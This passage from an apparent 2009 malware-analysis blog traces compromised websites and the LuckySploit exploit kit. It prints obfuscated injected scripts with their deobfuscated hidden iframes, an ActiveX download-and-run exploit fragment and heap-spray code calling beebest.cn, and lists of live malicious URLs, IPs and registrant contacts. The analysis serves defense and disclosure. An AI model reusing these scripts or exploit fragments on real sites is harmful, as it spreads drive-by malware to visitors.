293B7'+r36+'D7'+r36+'6617'+r36+'2206D7'+r36+'969613D7'+r36+'47'+r36+'27 '+r36+'5653B3C2F7'+r36+'3637'+r36+'2697'+r36+'07'+r36+'43E';alert(h49d2e3 64714d7(h49d2e36474be1));</script> The deobfuscated code is <script>if(!myia){document.write(unescape( '%3c%69%66%72%61%6d%65% 20%6e%61%6d%65%3d%63%32%37%20%73%72%63%3d%27%68%74%7 4%70%3a%2f%2f%65%78%74%72%61%73%70%72%61%79%2e%63%6f% 6d%2f%69%6e%2e%70%68%70%3f%27%2b%4d%61%74%68%2e%72%6f %75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29% 2a%34%31%31%33%38%29%2b%27%34%38%36%38%66%36%36%27%2 0%77%69%64%74%68%3d%33%30%37%20%68%65%69%67%68%74%3d %31%33%34%20%73%74%79%6c%65%3d%27%76%69%73%69%62%69% 6c%69%74%79%3a%68%69%64%64%65%6e%27%3e%3c%2f%69%66%72 %61%6d%65%3e'));}var myia=true;</script> which is an IFRAME <iframe name=c27 src='hxxp://extraspray.com/in.php?'+Math.round(Math.random()*41138)+'4868f66' width=307 height=134 style='visibility:hidden'></iframe> Analysis on March 25 hxxp://extraspray.com/in.php? URL Analysis hxxp://agkt.info/evo/getexe.exe ?o=7&t=1238025784&i=2154770527&e=   hxxp://agkt.info/evo/exploits/x19.php ?o=7&t=1238025784&i =2154770527   hxxp://agkt.info/evo/exploits/x18.php ?o=7&t=1238025784&i=2154770527   hxxp://agkt.info/evo/exploits/x21x1.php   hxxp://agkt.info/evo/getexe.exe ?o=4&t=1238025787&i=2154770527&e=   hxxp://rifnasax.cn/nuc/exe.php URL Analysis - VirusTotal (Kryptik) Analysis on April 17 hxxp://extraspray.com/in.php? URL Analysis hxxp://sgqw.info/evo/getexe.exe ?o=7&t=1239978315&i=2154770527&e=   hxxp://sgqw.info/evo/exploits/x19.php ?o=7&t=1239978315&i=2154770   hxxp://sgqw.info/evo/exploits/x18.php ?o=7&t=1239978315&i=2154770527 URL Analysis - VirusTotal - Anubis hxxp://sgqw.info/evo/getexe.exe ?o=7&t=1239978315&i=2154770527&e=18 URL Analysis - VirusTotal - Anubis Now with clarafin[.]info Analysis on April 17 (07:26) The source code show: <script>if (!myia){ document.write(unescape(' %3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%33% 32%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%63%6c %61%72%61%66%69%6e%2e%69%6e%66%6f%2f%74%72%61% 66%66%2f%69%6e%64%65%78%2e%70%68%70%3f%27%2b%4d %61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e% 72%61%6e%64%6f%6d%28%29%2a%32%35%33%38%35%39%29 %2b%27%35%31%66%34%63%38%65%32%66%65%31%27%20% 77%69%64%74%68%3d%35%38%39%20%68%65%69%67%68%7 4%3d%34%33%31%20%73%74%79%6c%65%3d%27%76%69%73 %69%62%69%6c%69%74%79%3a%68%69%64%64%65%6e%27% 3e%3c%2f%69%66%72%61%6d%65%3e')); } var myia = true; </script> which is the IFRAME for clarafin[.]info <iframe name=c32 src='hxxp://clarafin.info/traff/index.php?'+Math.round(Math.random() *253859)+'51f4c8e2fe1' width=589 height=431 style='visibility:hidden'> </iframe> You can follow the result for "clarafin.info" on this page: Internet Storm Center: Hosted javascript leading to .cn PDF malware ------------- And now the new one who just appear on the same page: beebest[.]cn Google Diagnosting for beebest.cn AS41665 (HOSTING) This is just a part of the code: function ss() { try{ ret=new ActiveXObject("snpvw.Snapshot Viewer Control.1"); var arbitrary _file = "hxxp://beebest.cn/dlutrl23dnwfas/exe.php"; var dest = 'C:/Program Files/Outlook Express/wab .exe'; document.write("<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'> </object> "); attack.SnapshotPath = arbitrary_file; setTimeout('window.location = "ldap://127.0.0.1"',3000); a ttack.CompressedPath = dest; attack.PrintSnapshot(arbitrary_file,dest); }catch(e){} } function xml() { var spray = unescape("%u0a0a%u0a0a"); do { spray += spray; } while(spray.length < 0xd0000); memory = new Array(); for(i = 0; i < 100; i++){ memory[i] = spray + shellcode; } document. getElementById("xmlplace").innerHTML = "<XML ID=I><X><C><! hxxp://beebest.cn/dlutrl23dnwfas/index.php URL Analysis hxxp://beebest.cn/dlutrl23dnwfas/spl/pdf.pdf URL Analysis hxxp://beebest.cn/dlutrl23dnwfas/exe.php VirusTotal - Anubis A ThreatExpertresult show the connection with stopgam.cn and stopgam2.cn after infection ThreatExpert Result It's recommended that you block these IPs using your hosts file or your firewall. These domain are also cited on Malware Domain List: 91.212.65.7 and all are still active. hxxp://beebest.cn 78.109.25.215 hxxp://clarafin.info 212.5.74.37 hxxp://corpamata.cn 78.109.25.215 hxxp://extraspray.com 72.232.116.51 hxxp://agkt.info   hxxp://rifnasax.cn 91.212.65.7 hxxp://sgqw.info 85.17.136.137 hxxp://stopgam.cn 85.17.136.137 hxxp://stopgam2.cn 174.129.244.106 174.129.241.185 78.109.25.217 IP Location - Namibia - Plathost2 - Ivan Kirst Domain Name: beebest.cn - stopgam.cn - corpamata.cn Domain Status: ok Registrant Organization: DomainsC Registrant Name: MichellGregory Administrative Email: abuse@domainsreg.cn Sponsoring Registrar: 厦门华融盛世网络有限公司 - Xiamen Huarong Spirit Network Limited Name Server: ns1.us.editdns.net Name Server: ns2.us.editdns.net Name Server: ns3.us.editdns.net Registration Date: 2009-02-11 Expiration Date: 2010-02-11 212.5.74.37 IP Location - Russia Domain Name: clarafin.info Domain Status: ok Billing Organization: XiaMen BizCn Computer & NetWork CO.,Ltd Name Server: ns1.us.editdns.net Name Server: ns2.us.editdns.net Name Server: ns3.us.editdns.net Registration Date: 2009-03-18 Expiration Date: 2010-03-18 85.17.136.137 IP Location - Netherlands - LeaseWeb omain Name: sgqw.info Domain Status: ok Registrant Organization: Private person Registrant Name: Sumir Mahadjan Administrative Email: mahadjans9@gmail.com Sponsoring Registrar: Regtime Ltd. (R455-LRMS) Name Server: ns1.mtpv.info Name Server: ns2.mtpv.info Name Server:ns3.us.editdns.net Registration Date: 2009-04-01 Expiration Date: 2010-01-01 72.232.116.51 IP Location - US - Layered Technologies, Inc. omain Name: extraspray.com Domain Status: ok Registrant Organization: Private person Registrant Name: Sumir Mahadjan Administrative Email: mahadjans9@gmail.com Sponsoring Registrar: Regtime Ltd. Name Server: vc11.amhost.net Name Server: vc12.amhost.net Registration Date: 2009-03-09 Expiration Date: 2010-03-09 174.129.244.106 174.129.241.185 IP Location - US - Amazon.com, Inc. Domain Name: stopgam2.cn ROID: 20090417s10001s12986159-cn Domain Status: clientTransferProhibited Registrant Name: Zitoclick Administrative Email: support@zitoclick.com Sponsoring Registrar: InamePro dba Dynadot Name Server: ns1.dsredirection.com Name Server: ns2.dsredirection.com Registration Date: 2009-04-17 05:23 Expiration Date: 2010-04-17 05:23 91.212.41.119 Domain Name: tixwagoq.cn Registrant Organization: 杭州五矿有限公司 - Minmetals Co., Ltd. Hangzhou Registrant Name: 周明 - Zhou Administrative Email: suhalbuia@163.com Sponsoring Registrar: 易名中国 - Easy Chinese Name Server: ns1.runsdns.cn Name Server: ns2.runsdns.cn Registration Date: 2009-03-18 22:16 Expiration Date: 2010-03-18 22:16 inetnum: 91.212.41.0 - 91.212.41.255 netname: gaztranzitstroyinfo-net descr: LLC "Gaztransitstroyinfo" country: Russia ------------ 91.212.65.7 IP Location - Ukraine - Eurohost LLC Domain Name: rifnasax.cn Registrant Organization: Yong also Import and Export Corporation Registrant Name: 张龙 - Long Administrative Email: alvin_555@yeah.net Sponsoring Registrar: 易名中国 - Easy Chinese Name Server: ns2.dnsmytruedns.com Name Server: ns1.dnsmytruedns.com Registration Date: 2009-02-13 19:29 Expiration Date: 2010-02-13 19:29 This IP appear to host several websites with live exploits. 91.212.65.7 hxxp://dnsmytruedns.com hxxp://hayboxiw.cn (Analysis) hxxp://paksusic.cn hxxp://paylayos.cn hxxp://peskufex.cn hxxp://porgacig.cn hxxp://qicdator.cn (Analysis) hxxp://ralcofic.cn hxxp://rifnasax.cn (Analysis) hxxp://tozxiqud.cn 91.212.41.119 hxxp://tixwagoq.cn/in.cgi?6 (Analysis)

Black Hat SEO - RBN Hacks, p.2

The silent threat: Black Hat SEO - Cyber Crime Toolkit Exposed Welcome to LuckySploit:) ITS TOASTED READ THIS page if you need more information WARNING: All sites listed on this page are dangerous (live URL with exploits) which lead to trojans beeing automatically installed on your computer. Do NOT visit them unless you know what you are doing. (only links are safe) A nice article provided by Finjan about the Lucky Sploit toolkit, one of the latest script kiddies that cyber criminals used these days can be found following this link: LuckySploit Toolkit Exposed Using well known technic such as "Code Obfuscation" most often used to hide its first intention (sometimes randomly generated), here is one of the numerous malicious script found on several compromised website. <iframe src='http://url/' width='1' height='1' style='visibility: hidden;'></iframe> <script>function c102916999516l4963660743084(l4963660743855){ var l4963660744026=16; return (parseInt(l4963660743855,l4963660744026));} function l4963660744fc7(l4963660745797){ function l4963660746f0b(){return 2;} var l4963660745f69=''; l4963660747eab=String.fromCharCode; for(l4963660746738=0;l4963660746738<l4963660745797.length; l4963660746738+=l4963660746f0b()){ l4963660745f69+=(l4963660747eab(c102916999516l4963660743084( l4963660745797.substr(l4963660746738,l4963660746f0b()))));} return l4963660745f69;} var x60=''; var l4963660748680='3C736'+x60+'3726'+x60+'970743E6'+x60+'96'+x60+'6'+x60 +'28216'+x60+'D796'+x60+'96'+x60+'1297B6'+x60+'46'+x60+'F6'+x60+'3756'+x 60+'D6'+x60+'56'+x60+'E742E77726'+x60+'9746'+x60+'528756'+x60+'E6'+x60+ '5736'+x60+'36'+x60+'1706'+x60+'528202725336'+x60+'32536'+x60+'392536'+ x60+'36'+x60+'2537322536'+x60+'312536'+x60+'6'+x60+'42536'+x60+ '352532302536'+x60+'6'+x60+'52536'+x60+'312536'+x60+'6'+x60+'42536'+x60+ '3525336'+x60+'42536'+x60+'332533312533302532302537332537322536'+x60+ '3325336'+x60+'42532372536'+x60+'3825373425373425373025336'+x60+ '125326'+x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+ x60+'6'+x60+'2536'+x60+'372536'+x60+'6'+x60+'6'+x60+'2533322536'+x60+ '6'+x60+'42536'+x60+'3525326'+x60+'52536'+x60+'6'+x60+'52536'+x60+ '3525373425326'+x60+'6'+x60+'25326'+x60+'52536'+x60+'372536'+x60+'6'+ x60+'6'+x60+'25326'+x60+'6'+x60+'2536'+x60+'332536'+x60+'382536'+x60+ '352536'+x60+'332536'+x60+'6'+x60+'225326'+x60+'52536'+x60+'382537342536'+ x60+'6'+x60+'42536'+x60+'6'+x60+'32532372532302537372536'+x60+'392536'+ x60+'342537342536'+x60+'3825336'+x60+'42533332533342533392532302536'+ x60+'382536'+x60+'352536'+x60+'392536'+x60+'372536'+x60+'3825373425336'+ x60+'42533352533352533372532302537332537342537392536'+x60+'6'+x60+ '32536'+x60+'3525336'+x60+'4253237253736'+x60+'2536'+x60+'392537332536'+ x60+'392536'+x60+'322536'+x60+'392536'+x60+'6'+x60+'32536'+x60+ '3925373425373925336'+x60+'12536'+x60+'382536'+x60+'392536'+x60+'342536'+ x60+'342536'+x60+'352536'+x60+'6'+x60+'525323725336'+x60+'525336'+x60+ '325326'+x60+'6'+x60+'2536'+x60+'392536'+x60+'36'+x60+'2537322536'+x60+ '312536'+x60+'6'+x60+'42536'+x60+'3525336'+x60+'52729293B7D76'+x60+'6'+ x60+'172206'+x60+'D796'+x60+'96'+x60+'13D7472756'+x60+'53B3C2F736'+x60+ '3726'+x60+'970743E';alert(l4963660744fc7(l4963660748680)); </script> The deobfuscated result is: <script> if(!myia){document.write(unescape('%3c%69%66%72%61%6d%65%20%6e %61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a% 2f%2f%67%6f%67%6f%32%6d%65%2e%6e%65%74%2f%2e%67%6f%2f%63% 68%65%63%6b%2e%68%74%6d%6c%27%20%77%69%64%74%68%3d%33% 34%39%20%68%65%69%67%68%74%3d%35%35%37%20%73%74%79%6c% 65%3d%27%76%69%73%69%62%69%6c%69%74%79%3a%68%69%64%64% 65%6e%27%3e%3c%2f%69%66%72%61%6d%65%3e'));} var myia=true; </script> and then load the IFRAME. <iframe name=c10 src='hxxp://gogo2me.net/.go/check.html' width=349 height=557 style='visibility:hidden'></iframe> Note that the script found in the second redirection show a lot of chat which refer different IPs or hacking problems (IFRAME injected) Google search for "if(!myia)" iframe An example of site on the same IP: gogo2me.netresolve to 94.247.2.157 [hs.2-157.zlkon.lv] and then load an IFRAME (with the LuckySpoit) hxxp://94.247.2.157/.dif/go.php?sid=1 hxxp://94.247.2.157/.lck/?t=3 hxxp://94.247.2.157/.lck/?t=6 http://94.247.2.157/.lck/?90f6ff8e287ae123... http://94.247.2.157/.lck/?75c4a0ecf4a4836... Wepawet Analysis A ThreatExpert analysis also indicate the relationship with these viruses/malware: Zlob variant (Trojan-Spy.Win32.Zbot), keylogger's trojan (Trojan-Spy.Zbot.YETH) and some TDSS (Alias Alureon) variant Win32.Fasec [Ikarus] And here I just show you the line :) Also note the use of RSA algorithm (screenshot) nextkey = ''; k = ''; attack_level = 0; try { f = 'Welcome to LuckySploit:) \n ITS TOASTED'; } catch (e){ }